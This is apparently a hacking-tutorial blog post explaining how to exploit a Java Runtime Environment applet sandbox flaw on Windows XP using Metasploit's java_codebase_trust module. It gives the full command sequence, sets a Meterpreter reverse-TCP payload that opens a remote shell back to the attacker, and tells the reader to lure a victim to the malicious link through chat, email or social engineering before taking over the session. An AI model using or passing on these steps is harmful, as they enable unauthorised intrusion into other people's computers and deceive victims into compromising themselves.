Hack Remote PC with Sun Java Applet2ClassLoader Remote Code Execution

This module exploits vulnerability in the Java Runtime Environment that allows an attacker to run an applet outside of the Java Sandbox. When an applet is invoked with: 1. A “codebase” parameter that points at a trusted directory 2. A “code” parameter that is a URL that does not contain any dots the applet will run outside of the sandbox. This vulnerability affects JRE prior to version 6 update 24.

Exploit Targets

Windows XP service pack 2

Windows XP service pack 3

Java 6 Standard Edition prior to update 20

Java 6 Standard Edition Update 18

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/java_codebase_trust

Msf exploit (java_codebase_trust)>set payload java/meterpreter/reverse_tcp

Msf exploit (java_codebase_trust)>set lhost 192.168.1.3 (IP of Local Host)

Msf exploit (java_codebase_trust)>set srvhost 192.168.1.3 (This must be an address on the local machine)

Msf exploit (java_codebase_trust)>set uripath javatrust (The Url to use for this exploit)

Msf exploit (java_codebase_trust)>exploit

Now an URL you should give to your victim http://192.168.1.3:8080/javatrust

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Leave a Reply

Your email address will not be published. Required fields are marked *